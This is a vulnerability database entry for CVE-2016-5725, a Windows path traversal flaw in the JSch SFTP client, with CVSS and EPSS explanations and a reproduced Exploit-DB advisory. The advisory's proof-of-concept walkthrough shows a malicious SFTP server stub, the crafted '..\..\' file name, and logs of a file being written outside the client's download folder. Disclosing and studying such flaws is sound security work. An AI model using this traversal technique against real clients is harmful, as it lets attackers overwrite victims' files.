CVE-2016-5725 Detail

CVE-2016-5725

Score / Severity

5.9

Medium

CVE Descriptions

Directory traversal vulnerability in JCraft JSch before 0.1.54 on Windows, when the mode is ChannelSftp.OVERWRITE, allows remote SFTP servers to write to arbitrary files via a ..\ (dot dot backslash) in a response to a recursive GET command.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-22	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V3.0	5.9	MEDIUM	CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N More informations Base: Exploitabilty Metrics The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Network A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers). Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. High A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. None The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope Metrics An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. Unchanged An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact Metrics The Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. None There is no loss of confidentiality within the impacted component. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. High There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. None There is no impact to availability within the impacted component. Temporal Metrics The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics	[email protected]
V2	4.3		AV:N/AC:M/Au:N/C:N/I:P/A:N	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 40411

Publication date : 2016-09-21 22h00 +00:00
Author : tintinweb
EDB Verified : Yes

Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725 Version: 0.3 Date: Aug 31st, 2016 Complete Proof of Concept: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40411.zip Tag: jsch recursive sftp get client-side windows path traversal Overview -------- Name: jsch Vendor: jcraft References: * http://www.jcraft.com/jsch/ [1] Version: 0.1.53 [2] Latest Version: 0.1.54 [2] Other Versions: <= 0.1.53 Platform(s): windows Technology: java Vuln Classes: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Origin: remote Min. Privs.: post auth CVE: CVE-2016-5725 Description --------- quote website [1] > JSch is a pure Java implementation of SSH2. JSch allows you to connect to an sshd server and use port forwarding, X11 forwarding, file transfer, etc., and you can integrate its functionality into your own Java programs. JSch is licensed under BSD style license. We have recognized that the following applications have used JSch. * Ant(1.6 or later). JSch has been used for Ant's sshexec and scp tasks. * Eclipse(3.0). Our Eclipse-CVSSSH2 plug-in has been included in Eclipse SDK 3.0. This plug-in will allow you to get ssh2 accesses to remote CVS repository by JSch. * NetBeans 5.0(and later) * Jakarta Commons VFS * Maven Wagon * Rational Application Devloper for WebSphere Software * HP Storage Essentials * JIRA * Trac WikiOutputStreamPlugin Summary ------- A malicious sftp server may force a client-side relative path traversal in jsch's implementation for recursive sftp-get allowing the server to write files outside the clients download basedir with effective permissions of the jsch sftp client process. * affects recursive get, i.e. sftp <host>:</path>/* . * post-auth * file overwrite capability depends on the client specified mode: `ChannelSftp.get(...,mode==ChannelSftp.OVERWRITE)` * windows only see attached PoC Details ------- * examples/Sftp.java::main:: c.get(p1, p2, monitor, mode); * ChannelSftp.java::get(String src, String dst, SftpProgressMonitor monitor, int mode) * ChannelSftp.java::_get(src,dst,monitor,mode,skip) Source ------ see ref github. Proof of Concept ---------------- see ref github. poc: 1. run `poc.py` to spawn the ssh/sftp stub listening for new connections on `0.0.0.0:3373`: poc.py --host=0.0.0.0 --port=3373 -l DEBUG -k test_rsa.key INFO:__main__:[cve-2016-5725] sftp server starting... INFO:__main__:* generating fake files INFO:__main__:** /..\..\totally_malicious_script INFO:__main__:* setting up sftp server INFO:__main__:* monkey patching: chattr INFO:__main__:* monkey patching: list_folder INFO:__main__:* monkey patching: mkdir INFO:__main__:* monkey patching: open INFO:__main__:* monkey patching: remove INFO:__main__:* monkey patching: rename INFO:__main__:* monkey patching: rmdir INFO:__main__:* monkey patching: stat INFO:__main__:* monkey patching: symlink INFO:__main__:* starting sftp server... 0.0.0.0 3373 2. connect to `poc.py` using jsch sftp-client example `examples/Sftp.java` (any user, user password): sftp> 3. issue a recursive get (any remote folder will do for the PoC) to store all files from `remote:fancyfolder` to `.`. Note: output may contain additional debug information not enabled by default in `examples/Sftp.java` Note: pwd is `<path>\workspace-ee\jsch` Note: local output folder is `.` (`<path>\workspace-ee\jsch`) sftp> get fancyfolder/* . 3. client connects to `poc.py` with subsystem sftp DEBUG:paramiko.transport:starting thread (server mode): 0x350afd0L DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.0 DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-JSCH-0.1.53 INFO:paramiko.transport:Connected (version 2.0, client JSCH-0.1.53) DEBUG:paramiko.transport:kex algos:[u'ecdh-sha2-nistp256', ... DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1 DEBUG:paramiko.transport:Cipher agreed: aes128-ctr DEBUG:paramiko.transport:MAC agreed: hmac-md5 DEBUG:paramiko.transport:Compression agreed: none DEBUG:paramiko.transport:kex engine KexGroup1 specified hash_algo ... DEBUG:paramiko.transport:Switch to new keys ... DEBUG:paramiko.transport:Auth request (type=none) ... INFO:paramiko.transport:Auth rejected (none). DEBUG:paramiko.transport:Auth request (type=password) ... INFO:paramiko.transport:Auth granted (password). DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes DEBUG:paramiko.transport:[chan 0] Max packet out: 32768 bytes DEBUG:paramiko.transport:Secsh channel 0 (session) opened. DEBUG:paramiko.transport:Starting handler for subsystem sftp 4. jsch sftp-client command `get fancyfolder/* .` calls `opendir(/fancyfolder)` on the PoC sftp server which responds with a fake filelist for `fancyfolder` listing the file `/..\..\totally_malicious_script`. DEBUG:paramiko.transport.sftp:[chan 0] Started sftp server on channel <paramiko.Channel 0 (open) window=2097152 -> <paramiko.Transport at 0x350afd0L (cipher aes128-ctr, 128 bits) (active; 1 open channel(s))>> DEBUG:paramiko.transport.sftp:[chan 0] Request: realpath DEBUG:paramiko.transport.sftp:[chan 0] Request: opendir INFO:__main__:LIST (u'/fancyfolder'): [<SFTPAttributes: [ size=44 uid=0 gid=9 mode=0100666 atime=1472758892 mtime=1472758897 ]>] DEBUG:paramiko.transport.sftp:[chan 0] Request: readdir DEBUG:paramiko.transport.sftp:[chan 0] Request: readdir DEBUG:paramiko.transport.sftp:[chan 0] Request: close 5. jsch sftp-client recursively downloads the files listed in the response to `opendir(/fancyfolder)` (sftp-get) by calling `stat`, `open` and `read` on the file. a) jsch sftp-client calls `stat` on the filename as returned by the servers response to `opendir` (with traversal): `stat(/fancyfolder//..\\..\\totally_malicious_script)` b) the sftp-server (PoC) returns file attributes for `totally_malicious_script` (with traversal) c) jsch sftp-client requests file `open` on the path (with traversal): `open(/fancyfolder//..\..\totally_malicious_script)` d) jsch sftp-client builds destination path by concatenating the destination folder ( `<path>\workspace-ee\jsch\.` ) with the server provided filename `/..\..\totally_malicious_script` stripping any data before and including `/` of the filename, then receives the remote files contents: ` <path>\workspace-ee\jsch\.\..\..\totally_malicious_script` e) the resulting sftp-client local destination path `dst <path>\workspace-ee\jsch\.\..\..\totally_malicious_script` is outside the basedir `<path>\workspace-ee\jsch\.` sftp-server (PoC) DEBUG:paramiko.transport.sftp:[chan 0] Request: stat INFO:__main__:STAT (u'/fancyfolder//..\\..\\totally_malicious_script') INFO:__main__:STAT - returning: totally_malicious_script INFO:__main__:** /..\..\totally_malicious_script DEBUG:paramiko.transport.sftp:[chan 0] Request: open INFO:__main__:OPEN: /fancyfolder//..\..\totally_malicious_script DEBUG:paramiko.transport.sftp:[chan 0] Request: read DEBUG:paramiko.transport.sftp:[chan 0] Request: read DEBUG:paramiko.transport.sftp:[chan 0] Request: read DEBUG:paramiko.transport.sftp:[chan 0] Request: close sftp-client (jsch) dst <path>\workspace-ee\jsch\.\..\..\totally_malicious_script _get: /fancyfolder//..\..\totally_malicious_script, java.io.FileOutputStream@7ccf3329 sftp> 6. downloaded file is stored in server controlled relative path on client tintin@testbox ~<path>/workspace-ee/jsch $ ls ../../total* ../../totally_malicious_script Notes ----- * the PoC is a slightly modified version `stub_sftp.py` shipped with paramiko/tests [4]. * we've seen ssh bots in the wild using jsch probing for weak ssh passwords. Vendor response: see [5] References ---------- [1] http://www.jcraft.com/jsch/ [2] https://sourceforge.net/projects/jsch/files/?source=navbar [3] https://sourceforge.net/projects/jsch/files/jsch/0.1.53 [4] https://github.com/paramiko/paramiko/blob/master/tests/stub_sftp.py [5] http://www.jcraft.com/jsch/ChangeLog